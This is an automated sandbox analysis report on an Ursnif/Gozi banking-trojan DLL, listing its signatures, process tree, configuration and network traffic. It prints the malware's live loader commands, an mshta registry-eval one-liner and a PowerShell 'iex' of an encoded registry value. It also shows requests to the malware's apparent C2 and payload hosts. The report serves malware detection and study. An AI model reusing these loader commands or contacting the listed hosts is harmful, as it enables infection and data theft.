Loading ...

Play interactive tourEdit tour

Analysis Report Ne6A4k8vK6.dll

Overview

General Information

Sample Name:Ne6A4k8vK6.dll
Analysis ID:353246
MD5:282b902a356c196b4a097431a9aa576e
SHA1:2bf3698a4f386c2f30b810964f1045ccc6929bdd
SHA256:d33a4d3ac76095145e6061009fc20432b5c2c6ec4a828c7b6956ea5f072f2c34
Tags:dllGoziISFBUrsnif

Most interesting Screenshot:

Detection

Ursnif
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: Dot net compiler compiles file from suspicious location
Yara detected Ursnif
Allocates memory in foreign processes
Changes memory attributes in foreign processes to executable or writable
Compiles code for process injection (via .Net compiler)
Creates a thread in another existing process (thread injection)
Hooks registry keys query functions (used to hide registry keys)
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the export address table of user mode modules (user mode EAT hooks)
Modifies the import address table of user mode modules (user mode IAT hooks)
Modifies the prolog of user mode functions (user mode inline hooks)
Sigma detected: MSHTA Spawning Windows Shell
Suspicious powershell command line found
Writes or reads registry keys via WMI
Writes registry values via WMI
Writes to foreign memory regions
Compiles C# or VB.Net code
Contains capabilities to detect virtual machines
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality to launch a process as a different user
Contains functionality to query CPU information (cpuid)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file does not import any functions
Queries the installation date of Windows
Queries the volume information (name, serial number etc) of a device
Registers a DLL
Sample file is different than original file name gathered from version info
Searches for the Microsoft Outlook file path
Tries to load missing DLLs
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

Startup

  • System is w10x64
  • loaddll32.exe (PID: 6696 cmdline: loaddll32.exe 'C:\Users\user\Desktop\Ne6A4k8vK6.dll' MD5: 8081BC925DFC69D40463079233C90FA5)
    • regsvr32.exe (PID: 6708 cmdline: regsvr32.exe /s C:\Users\user\Desktop\Ne6A4k8vK6.dll MD5: 426E7499F6A7346F0410DEAD0805586B)
      • control.exe (PID: 2156 cmdline: C:\Windows\system32\control.exe -h MD5: 625DAC87CB5D7D44C5CA1DA57898065F)
    • cmd.exe (PID: 6728 cmdline: C:\Windows\system32\cmd.exe /c 'C:\Program Files\Internet Explorer\iexplore.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • iexplore.exe (PID: 6744 cmdline: C:\Program Files\Internet Explorer\iexplore.exe MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)
        • iexplore.exe (PID: 6828 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6744 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
        • iexplore.exe (PID: 6568 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6744 CREDAT:17426 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
        • iexplore.exe (PID: 1632 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6744 CREDAT:17432 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
        • iexplore.exe (PID: 5224 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6744 CREDAT:17442 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
  • mshta.exe (PID: 6676 cmdline: 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\Actidsrv'));if(!window.flag)close()</script>' MD5: 197FC97C6A843BEBB445C1D9C58DCBDB)
    • powershell.exe (PID: 3732 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi)) MD5: 95000560239032BC68B4C2FDFCDEF913)
      • conhost.exe (PID: 5376 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • csc.exe (PID: 1324 cmdline: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\blohq23h\blohq23h.cmdline' MD5: B46100977911A0C9FB1C3E5F16A5017D)
        • cvtres.exe (PID: 5292 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESA54D.tmp' 'c:\Users\user\AppData\Local\Temp\blohq23h\CSC8288F7A0C087479098ACD74FC9F3E61F.TMP' MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)
      • csc.exe (PID: 5236 cmdline: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\3upkr1gh\3upkr1gh.cmdline' MD5: B46100977911A0C9FB1C3E5F16A5017D)
  • cleanup

Malware Configuration

Threatname: Ursnif

{"server": "730", "os": "10.0_0_17134_x64", "version": "250180", "uptime": "156", "system": "1c5e3cccb7efbfdcae35102f01307909hh", "size": "202829", "crc": "2", "action": "00000000", "id": "1100", "time": "1613453310", "user": "f73be0088695dc15e71ab15cc8e7488a", "hash": "0xf857f57e", "soft": "3"}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000001.00000003.336276523.0000000005248000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
    00000026.00000003.420376736.000001A5E0F30000.00000004.00000001.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
      00000026.00000003.420376736.000001A5E0F30000.00000004.00000001.sdmpGoziRuleWin32.GoziCCN-CERT
      • 0x8f0:$: 63 00 6F 00 6F 00 6B 00 69 00 65 00 73 00 2E 00 73 00 71 00 6C 00 69 00 74 00 65 00 2D 00 6A 00 ...
      00000001.00000003.336080557.0000000005248000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
        00000001.00000003.336180979.0000000005248000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
          Click to see the 15 entries

          Sigma Overview

          System Summary:

          barindex
          Sigma detected: Dot net compiler compiles file from suspicious locationShow sources
          Source: Process startedAuthor: Joe Security: Data: Command: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\blohq23h\blohq23h.cmdline', CommandLine: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\blohq23h\blohq23h.cmdline', CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi)), ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 3732, ProcessCommandLine: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\blohq23h\blohq23h.cmdline', ProcessId: 1324
          Sigma detected: MSHTA Spawning Windows ShellShow sources
          Source: Process startedAuthor: Michael Haag: Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi)), CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi)), CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\Actidsrv'));if(!window.flag)close()</script>', ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 6676, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi)), ProcessId: 3732

          Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Found malware configurationShow sources
          Source: regsvr32.exe.6708.1.memstrMalware Configuration Extractor: Ursnif {"server": "730", "os": "10.0_0_17134_x64", "version": "250180", "uptime": "156", "system": "1c5e3cccb7efbfdcae35102f01307909hh", "size": "202829", "crc": "2", "action": "00000000", "id": "1100", "time": "1613453310", "user": "f73be0088695dc15e71ab15cc8e7488a", "hash": "0xf857f57e", "soft": "3"}
          Multi AV Scanner detection for submitted fileShow sources
          Source: Ne6A4k8vK6.dllVirustotal: Detection: 13%Perma Link

          Compliance:

          barindex
          Uses 32bit PE filesShow sources
          Source: Ne6A4k8vK6.dllStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
          Uses new MSVCR DllsShow sources
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeFile opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dllJump to behavior
          Uses secure TLS version for HTTPS connectionsShow sources
          Source: unknownHTTPS traffic detected: 104.20.184.68:443 -> 192.168.2.3:49730 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 104.20.184.68:443 -> 192.168.2.3:49729 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.3:49746 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.3:49744 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.3:49742 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.3:49745 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.3:49743 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.3:49747 version: TLS 1.2
          Binary contains paths to debug symbolsShow sources
          Source: Binary string: partial method>An expression tree may not contain an unsafe pointer operationAAn expression tree may not contain an anonymous method expressionHAn anonymous method expression cannot be converted to an expression tree@Range variable '%1!ls!' cannot be assigned to -- it is read onlyPThe range variable '%1!ls!' cannot have the same name as a method type parameterKThe contextual keyword 'var' cannot be used in a range variable declarationaThe best overloaded Add method '%1!ls!' for the collection initializer has some invalid argumentsAAn expression tree lambda may not contain an out or ref parameterJAn expression tree lambda may not contain a method with variable argumentsSSpecify debug information file name (default: output file name with .pdb extension)$Specify a Win32 manifest file (.xml))Do not include the default Win32 manifestNSpecify an application configuration file containing assembly binding settings8Output line and column of the end location of each errorFBuild a Windows Runtime intermediate file that is consumed by WinMDExp Build an Appcontainer executable+Specify the preferred output language name.3Could not write to output file '%2!ls!' -- '%1!ls!' source: csc.exe, 00000023.00000002.411859001.000002A2AAE80000.00000002.00000001.sdmp, csc.exe, 00000027.00000002.420747019.00000269E51E0000.00000002.00000001.sdmp
          Source: Binary string: ntdll.pdb source: regsvr32.exe, 00000001.00000003.415909336.0000000005BD0000.00000004.00000001.sdmp
          Source: Binary string: c:\Pieceespecially\watchPeriod\farmShine\Sing.pdb source: Ne6A4k8vK6.dll
          Source: Binary string: ntdll.pdbUGP source: regsvr32.exe, 00000001.00000003.415909336.0000000005BD0000.00000004.00000001.sdmp
          Source: Binary string: rundll32.pdb source: control.exe, 00000026.00000002.467494612.000001A5E2DCC000.00000004.00000040.sdmp
          Source: Binary string: rundll32.pdbGCTL source: control.exe, 00000026.00000002.467494612.000001A5E2DCC000.00000004.00000040.sdmp
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 1_2_008F3512 Wow64EnableWow64FsRedirection,RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,FindCloseChangeNotification,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree,1_2_008F3512
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 1_2_042FB88D lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError,1_2_042FB88D
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 1_2_042F4CF1 FindFirstFileW,lstrlenW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrcpyW,FindNextFileW,FindClose,FreeLibrary,1_2_042F4CF1
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 1_2_04305518 wcscpy,lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,1_2_04305518
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 1_2_042F834C RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,CloseHandle,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree,1_2_042F834C
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 1_2_042F16E1 wcscpy,wcscpy,GetLogicalDriveStringsW,GetLogicalDriveStringsW,RtlAllocateHeap,memset,GetLogicalDriveStringsW,WaitForSingleObject,GetDriveTypeW,lstrlenW,wcscpy,lstrlenW,HeapFree,1_2_042F16E1
          Source: global trafficHTTP traffic detected: GET /jvassets/xI/t64.dat HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: c56.lepini.at
          Source: Joe Sandbox ViewIP Address: 104.20.184.68 104.20.184.68
          Source: Joe Sandbox ViewJA3 fingerprint: 9e10692f1b7f78228b2d4e424db3a98c
          Source: global trafficHTTP traffic detected: GET /api1/nH23HHDrgk/10Cw7k0sEsFdP7SDZ/GJzI8RwZt_2F/lJSbcpCS9kd/So9_2FRP7wVauo/K_2FZsHvY_2BQo_2B8KvW/kveNSQqUDIB8KWkD/_2BFdRg0RIG_2BM/KBDjblq5CBzqopMAX_/2BiqcvBwe/7091jLT4LvMbkLNdIBL_/2FJrqtJSJIzTB5wtJ4U/pKouwXKTg9H_2FU5iFL7fr/G5kdpSuG0DFl4/78sStOBq/1KCwgfl2cve2_2B91ieBA_2/BG_2BoI5kj/vpZCVzwwZvJx0j7Ia/gE7Fru2i7y88/pRsD_2Fy5JZ/pq9kw97v_2BgUx/yAzHUV1dSPgWD6UrhGUax/xyL8sVq_2BL2eSk/cu1E HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: api10.laptok.atConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: api10.laptok.atConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /api1/gtYC_2BK_2FjCAsja/Qyq2AzjFZWki/EyFB_2F9syK/YEZOamZx4Lsvyb/NcUbBRiZnrBjBYyMQ6_2F/wKkcR85o4YpV1aiF/bH4gnTGDFJUIMEM/mE561SA0pEAEX_2Bym/efdVnFq7t/Uwc_2FyPO9MzSPJ4_2BU/t81Od1UbJHPetnRHsOT/rqXpHd7rYb4we6DkYU8imU/_2FSOVXLJM_2F/q6lazIta/_2F2_2BRQRLToH8swdYpdCX/22UvKXxbXV/jGu2E55VFqiwaQRp_/2BPcB4S_2F_2/BSRTbomcVfZ/RJtYgUcyfI1_2F/UArwf2CGHs_2B7xiuzpXf/hgcLVbPoq_2FekGC/m5J0XG9A/7iZlQL_2/F HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: api10.laptok.atConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: api10.laptok.atConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /api1/jzRoxFaC/VGe9D7ZFmtXM2P4WCtXue9i/9UasgR41C7/sUfUr2FPy8aFKQY_2/Bz_2Bn96rDq4/tc7hI4JWi9m/eAoTwSqab6IBJQ/rTwjMGXE3TRb_2FfjUanN/uq7E8yfih5MI9t0m/qpGu2Sq1UQFLURx/pZERC59_2BSrD1zxX_/2FLMHRYnS/Ogu9FB1M7pDsaHxJB5Qy/wnhAaa5h1vW_2FtCzN_/2BnK5hTB5fTJiaqUovmqWy/Ja6s_2BdtmTOE/X8q6_2F2/V3tdgiIR_2BIp0Hf7KFyggN/xa_2BvXTdf/7xkiiYsdPc4BVaNQ5/VezMmr_2BFNF/qenARXrgKUh/s4DIWvPVD/dh9Eh3 HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: api10.laptok.atConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /jvassets/xI/t64.dat HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: c56.lepini.at
          Source: global trafficHTTP traffic detected: GET /api1/8_2FVgZpGgOpBtPbJtTC/2rMn4UngXKzbuPU6_2F/HMrKuoN_2FrAmSXD_2BLs1/_2BBTwBp4cn7d/E9xMiSRD/EFtTe76YzG6SwcxvsD6t_2B/HIWd_2BnZu/GC7JETGujSFr8ZPF8/xnPVInDfXKwF/NPgQVsTwu8S/fODbYSsgOG1Kvc/kzeOFOJoGwu_2FiqONxDX/ZrCaCgDo8dJu1lDT/GTsLFQvN3R9_2B4/pKgPpYToMQzrl1Jpjk/iH_2FdE98/UAkOcl0pZ1330cRb_2Br/G6mmM7PXa9UEYS394sU/YUU8DGx_2Fbfi2xSZi4oaM/9ScFDx320/O21oW HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:85.0) Gecko/20100101 Firefox/85.0Host: api3.lepini.at
          Source: global trafficHTTP traffic detected: GET /api1/wu2u0mamvle7KD3/V6FhzqyfAxIIU2CaAI/qIlRS_2Fx/CthpOK_2Fj8wKLTLfSVs/rYUWFtewT2k11AN4cZS/nADSbEjd5nmtg_2FvKXti7/hC7JJIuUA46Uh/TPa1y6Ss/9sd_2BknTwiuDaVPT_2BJN_/2Bo_2BxpLD/baYT3TeDtFAjqrMrY/4u4jy8DGteXw/aQ07htYAD6p/ExCU5Jl803zQQH/31SKQURjSKCAIf_2FCppg/AgmycwtL1yYvooXF/yeog_2FgLesyEFb/I955KrmqJ1PjWL_2Be/bF8vRaRbN/pHkoU68_2FcveZ9A_2F9/c0dMMHLi/F4if1 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:85.0) Gecko/20100101 Firefox/85.0Host: api3.lepini.at
          Source: de-ch[1].htm.5.drString found in binary or memory: <a href="https://www.facebook.com/" target="_blank" data-piitxt="facebooklite" piiurl="https://www.facebook.com/"> equals www.facebook.com (Facebook)
          Source: msapplication.xml0.3.drString found in binary or memory: <browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0x8417ab8b,0x01d70424</date><accdate>0x8417ab8b,0x01d70424</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.facebook.com (Facebook)
          Source: msapplication.xml0.3.drString found in binary or memory: <browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0x8417ab8b,0x01d70424</date><accdate>0x8417ab8b,0x01d70424</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Facebook.url"/></tile></msapplication></browserconfig> equals www.facebook.com (Facebook)
          Source: msapplication.xml5.3.drString found in binary or memory: <browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0x841ac559,0x01d70424</date><accdate>0x841ac559,0x01d70424</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.twitter.com (Twitter)
          Source: msapplication.xml5.3.drString found in binary or memory: <browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0x841ac559,0x01d70424</date><accdate>0x841c014f,0x01d70424</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Twitter.url"/></tile></msapplication></browserconfig> equals www.twitter.com (Twitter)
          Source: msapplication.xml7.3.drString found in binary or memory: <browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0x841d8b5c,0x01d70424</date><accdate>0x841d8b5c,0x01d70424</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.youtube.com (Youtube)
          Source: msapplication.xml7.3.drString found in binary or memory: <browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0x841d8b5c,0x01d70424</date><accdate>0x841d8b5c,0x01d70424</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Youtube.url"/></tile></msapplication></browserconfig> equals www.youtube.com (Youtube)
          Source: de-ch[1].htm.5.drString found in binary or memory: <link rel="preconnect" href="img-s-msn-com.akamaized.net" /><link rel="preconnect" href="c.msn.com" /><link rel="preconnect" href="c.msn.cn" /><link rel="preconnect" href="https://www.bing.com" /><link rel="preconnect" href="//web.vortex.data.msn.com" /><link rel="dns-prefetch" href="img-s-msn-com.akamaized.net" /><link rel="dns-prefetch" href="c.msn.com" /><link rel="dns-prefetch" href="c.msn.cn" /><link rel="dns-prefetch" href="https://www.bing.com" /><link rel="dns-prefetch" href="//web.vortex.data.msn.com" /><link rel="canonical" href="https://www.msn.com/de-ch/" /><meta name="msapplication-TileColor" content="#224f7b"/><meta name="msapplication-TileImage" content="//static-global-s-msn-com.akamaized.net/hp-neu/sc/1f/08ced4.png"/><meta name="msapplication-config" content="none"/> <title>MSN Schweiz | Sign in Hotmail, Outlook Login, Windows Live, Office 365</title> equals www.hotmail.com (Hotmail)
          Source: 85-0f8009-68ddb2ab[1].js.5.drString found in binary or memory: glich.",errorFooterText:"Zu Twitter wechseln",taskLinks:"Benachrichtigungen|https://twitter.com/i/notifications;Ich|#;Abmelden|#"}],xbox:[{header:"Spotlight",content:"",footerText:"Alle anzeigen",footerUrl:"",taskLinks:"me_groove_taskLinks_store|https://www.microsoft.com/store/media/redirect/music?view=hub;me_groove_taskLinks_play|https://aka.ms/Ixhi8e;me_groove_taskLinks_try|https://aka.ms/msvmj1"},{header:"Meine tolle Wiedergabeliste",headerUrl:"https://aka.ms/qeqf5y",content:"",errorMessage:"",taskLinks:"me_groove_taskLinks_store|https://www.microsoft.com/store/media/redirect/music?view=hub;me_groove_taskLinks_play|https://aka.ms/Ixhi8e;me_groove_taskLinks_try|https://aka.ms/msvmj1"}],bingrewards:[{header:"Pr equals www.twitter.com (Twitter)
          Source: de-ch[1].htm.5.drString found in binary or memory: hren, die sich auf Ihren Internetdatenverkehr auswirken.<br/><br/><a href=\""+e.html(f)+'" onclick="window.location.reload(true)">Klicken Sie hier<\/a> um diese Seite erneut zu laden, oder besuchen Sie: <a href="'+i+'">'+i+"<\/a><\/p><\/div><div id='errorref'><span>Ref 1: "+e.html(o(t.clientSettings.aid))+"&nbsp;&nbsp;&nbsp;Ref 2: "+e.html(t.clientSettings.sid||"000000")+"&nbsp;&nbsp;&nbsp;Ref 3: "+e.html((new r.Date).toUTCString())+"<\/span><\/div><\/div>"});ot({errId:1512,errMsg:n})}function ot(n){require(["track"],function(t){var i={errId:n.errId,errMsg:n.errMsg,reportingType:0};t.trackAppErrorEvent(i)})}function tt(){var n=v(arguments);a(l(n,b),n,!0)}function st(){var n=v(arguments);a(l(n,h),n)}function ht(){var n=v(arguments);a(l(n,y),n)}function ct(n){(r.console||{}).timeStamp?console.timeStamp(n):(r.performance||{}).mark&&r.performance.mark(n)}var w=0,it=-1,b=0,h=1,y=2,s=[],p,k,rt,o,d=!1,c=Math.random()*100<=-1;return ut(r,function(n,t,i,r){return w++,n=nt(n,t,i,r," [ENDMESSAGE]"),n&&tt("[SCRIPTERROR] "+n),!0}),c&&require(["jquery","c.deferred"],function(n){k=!0;rt=n;s.length&&g()}),{error:tt,fatalError:et,unhandledErrorCount:function(){return w},perfMark:ct,warning:st,information:ht}});require(["viewAwareInit"],function(n){n({size2row:"(min-height: 48.75em)",size1row:"(max-height: 48.74em)",size4column:"(min-width: 72em)",size3column:"(min-width: 52.313em) and (max-width: 71.99em)",size2column:"(min-width: 43.75em) and (max-width: 52.303em)",size2rowsize4column:"(min-width: 72em) and (min-height: 48.75em)",size2rowsize3column:"(min-width: 52.313em) and (max-width: 71.99em) and (min-height: 48.75em)",size2rowsize2column:"(max-width: 52.303em) and (min-height: 48.75em)",size1rowsize4column:"(min-width: 72em) and (max-height: 48.74em)",size1rowsize3column:"(min-width: 52.313em) and (max-width: 71.99em) and (max-height: 48.74em)",size1rowsize2column:"(max-width: 52.303em) and (max-height: 48.74em)"})});require(["deviceInit"],function(n){n({AllowTransform3d:"false",AllowTransform2d:"true",RtlScrollLeftAdjustment:"negativeValue",ShowMoveTouchGestures:"true",SupportFixedPosition:"true",UseCustomMatchMedia:null,Viewport_Behavior:"Default",Viewport_Landscape:null,Viewport:"width=device-width,initial-scale=1.0",IsMobileDevice:"false"})})</script><meta property="sharing_url" content="https://www.msn.com/de-ch"/><meta property="og:url" content="https://www.msn.com/de-ch/"/><meta property="og:title" content="MSN Schweiz | Sign in Hotmail, Outlook Login, Windows Live, Office 365"/><meta property="twitter:card" content="summary_large_image"/><meta property="og:type" content="website"/><meta property="og:site_name" content="MSN"/><meta property="og:image" content="https://static-global-s-msn-com.akamaized.net/hp-neu/sc/c6/519670.jpg"/><link rel="shortcut icon" href="//static-global-s-msn-com.akamaized.net/hp-neu/sc/2b/a5ea21.ico" /><style>@media screen and (max-width:78.99em) and (min-width:58.875em){.layout-none:not(.mod1) .pos2{left:0}}.ie8 .grid .pick
          Source: 85-0f8009-68ddb2ab[1].js.5.drString found in binary or memory: pfen Sie Ihr Skype-Konto und Ihr Microsoft-Konto.",continueButtonText:"Weiter",learnMoreText:"Hilfe",learnMoreUrl:"https://support.skype.com",callMessageText:"Anruf",fileMessageText:"Datei gesendet",videoMessageText:"Videonachricht",contactMessageText:"Kontakt gesendet"}],jsskype:[{},{}],facebookLite:[{},{likeUrl:"https://www.facebook.com/msnch"}],twitter:[{header:"Twitter",content:"Rufen Sie Ihre Twitter-Updates ab",footerText:"Anmelden",footerUrl:"https://twitter.com",requestTimeout:"10000",taskLinks:""},{header:"Tweets",headerUrl:"https://twitter.com",content:"Laden ...",noContent:"Ihre Timeline ist derzeit leer",errorMessage:"Anmelden bei Twitter nicht m equals www.facebook.com (Facebook)
